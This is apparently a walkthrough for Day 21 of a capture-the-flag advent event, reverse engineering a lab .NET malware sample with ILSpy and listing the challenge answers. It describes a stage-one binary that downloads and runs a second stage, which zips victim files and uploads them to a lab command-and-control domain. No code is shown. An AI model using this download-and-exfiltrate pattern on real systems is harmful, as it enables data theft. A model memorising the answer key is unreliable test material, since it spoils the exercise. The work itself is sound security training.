Day 21
HELP ME...I'm REVERSE ENGINEERING!
Last updated
Was this helpful?
HELP ME...I'm REVERSE ENGINEERING!
Last updated
Was this helpful?
Welcome to Day 21 of Advent of Cyber 2024 🎄
Today’s challenge dives into the fascinating world of reverse engineering using ILSpy.
Introduction to Reverse Engineering
Reverse engineering involves deconstructing software or binaries to understand their behavior. It’s a vital cybersecurity technique used to:
Identify malware functionality.
Detect security flaws in applications.
Attribute binaries to specific threat actors.
Lets Begin:
We have an exe named WarevilleApp.exe
We need to decompile this and find the answers to questions:
Open this exe in ILSpy;
First we need to find the function name that downloads and executes files in the WarevilleApp.exe:
expand the Form1 section and inspect :
Here we can find the DownloadandExecute() function used to download explorer.exe from mayorc2.thm
Lets run this WarevilleApp.exe:
When we run this a file named exlorer.exe will be downloaded, we need to decompile that to find more answers:
Open explorer.exe in ILSpy:
Visit the Pictures folder to check the zip file:
We can see the zip file named CollectedFiles.zip
and finally to find the name of the C2 server:
check the UploadFiletoServer function of explorer.exe
We can see the server name: anonymousc2.thm
1.What is the function name that downloads and executes files in the WarevilleApp.exe?
A: DownloadAndExecuteFile
2.Once you execute the WarevilleApp.exe, it downloads another binary to the Downloads folder. What is the name of the binary?
A: explorer.exe
3.What domain name is the one from where the file is downloaded after running WarevilleApp.exe?
A: mayorc2.thm
4.The stage 2 binary is executed automatically and creates a zip file comprising the victim's computer data; what is the name of the zip file?
A: CollectedFiles.zip
5.What is the name of the C2 server where the stage 2 binary tries to upload files?
A: anonymousc2.thm
Stay tuned for Day 22 and Happy Hacking 🎄
Thank you!
